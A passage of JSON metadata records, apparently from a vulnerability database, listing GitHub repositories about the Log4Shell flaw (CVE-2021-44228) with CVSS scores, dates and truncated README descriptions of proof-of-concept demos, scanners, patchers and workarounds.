"AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:20:18", "description": "# vCenter Server Workaround instructions CVE-2021-44228\n Workaro...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T05:14:05", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-03-19T00:01:25", "id": "DFF2F784-9ED2-50EF-B79E-3EBF5A9B5428", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:55:49", "description": "# Workaround for CVE-2021-44228 (Log4j RCE exploit) as a buildpa...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T23:34:52", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-10-06T19:08:01", "id": "EA3173CE-C426-5047-864A-480B1A30F235", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:36:01", "description": "# Log4Shell POC Demo\n\nThis repository contains a submodule, clon...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T04:20:40", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-07-23T00:49:26", "id": "D5003B3C-B1D9-5840-816F-1AFEBCAC7FD3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:58:14", "description": "# CVE-2021-44228 Remote Code Injection In Log4j\n\nhttps://twitter...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T05:23:44", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-11-29T06:51:15", "id": "473FFDA9-E615-53B6-9A81-F98A1ABD700E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T19:06:20", "description": "# Healer...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-09T21:49:33", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-11-29T23:22:43", "id": "71D962ED-2525-53CE-88D0-D8CD92FB0C02", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T19:06:22", "description": "# Log4Shell\n\n<div align=\"center\">\n<img src=\"https://miro.medium....", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-02-08T12:19:32", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-07-08T21:09:12", "id": "F99D82FC-3BE5-5B6D-8FDC-0E5BF9C0CE58", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T19:25:12", "description": "# f-for-java\na project writ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T01:31:06", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-24T18:06:45", "id": "76F0B9E8-D173-5309-9826-5880F8B35043", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T19:08:02", "description": "# Log4j2 2.14.1 LDAP \uc6d0\uaca9 \ucf54\ub4dc \uc2e4\ud589 \ucde8\uc57d\uc810(CVE-2021-44228) \ud655\uc778\n\n> \ud83c\udf88 Spring...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-03T04:36:41", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-09T19:59:25", "id": "4BD74B8C-D553-57C6-AB15-6B899401AAA4", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T19:07:27", "description": "# Disclaimer\nThis project is for personal practice purposes only...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-03-20T12:13:13", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-03-20T12:13:13", "id": "3E66E49D-6A9B-530D-AF77-12B96257655A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T19:07:30", "description": "# \u672c\u5de5\u5177\u4ec5\u4e3a\u4f01\u4e1a\u6d4b\u8bd5\u6f0f\u6d1e\u4f7f\u7528\uff0c\u4e25\u7981\u4ed6\u4eba\u4f7f\u7528\u672c\u5de5\u5177\u653b\u51fb\n# \u672c\u5de5\u5177\u4ec5\u4e3a\u4f01\u4e1a\u6d4b\u8bd5\u6f0f\u6d1e\u4f7f\u7528\uff0c\u4e25\u7981\u4ed6\u4eba\u4f7f\u7528\u672c\u5de5\u5177\u653b\u51fb\n# \u672c\u5de5\u5177\u4ec5\u4e3a\u4f01...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T07:19:11", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-12-05T14:09:48", "id": "09509FA9-9FC3-5B64-900D-F0842DC8BCF7", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:54:58", "description": "# Log4jPatcher\n\nA Java Agent based mitigation for Log4j2 JNDI ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T09:16:46", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-07T05:02:38", "id": "A57FBD78-A654-5CEE-8291-163C8AFB7210", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:52:57", "description": "# log4j-log4shell-affected\nLists of affected components and affe...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T14:05:05", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-03-08T09:40:40", "id": "FB83113C-AABD-5893-8DDE-332B57F4FDD4", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:35:12", "description": "# Log4Shell-IOCs\nIOC feeds curated by WatchGuard Threat Lab that...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T15:58:14", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T15:59:33", "id": "034AFC0C-D411-5F4A-BBAB-630A6C972933", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:35:22", "description": "<h1 align=\"center\">PY-Log4ShellScanner</h1>\n<h4 align=\"center\">A...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T10:06:07", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T10:40:07", "id": "21B5671D-2A35-52FF-9702-380A32B96260", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:39:05", "description": "# scanlist-log4j\nSimple bash script to scan multiples url for lo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T12:20:00", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T15:36:11", "id": "03C230DA-F801-5660-BF8E-AB8F44E2755C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:50:31", "description": "# log4j_checker_beta - Linux, macOS and Windows Scripts\n\nIf you ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T04:14:18", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-11-19T20:44:39", "id": "BFBBD550-B2CF-524B-87F6-D0A8980CDFD3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:50:50", "description": "# log4j-jndi-be-gone\n\nA [Byte Buddy](https://bytebuddy.net/) Jav...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T15:29:20", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-11-03T08:18:38", "id": "066BA250-177D-5017-9AC2-6B948A465ABC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:41:05", "description": "# log4j-Scan-Burpsuite\nLog4j\u6f0f\u6d1e\uff08CVE-2021-44228\uff09\u7684Burpsuite\u68c0\u6d4b\u63d2\u4ef6\n\u5305\u542b\u5f00...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T09:58:02", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-06-13T16:03:37", "id": "70582B5B-E1E6-5767-94A6-39740A96A052", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:48:10", "description": "# log4j-scanner\n# CVE-2021-44228\nSimp...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T08:51:56", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-28T11:34:04", "id": "0A26B4F0-3175-58BE-9CE7-133C9D85E181", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:46:30", "description": "# Log4j_checker.py (CVE-2021-44228)\n![poc_log4j](https://user-im...", 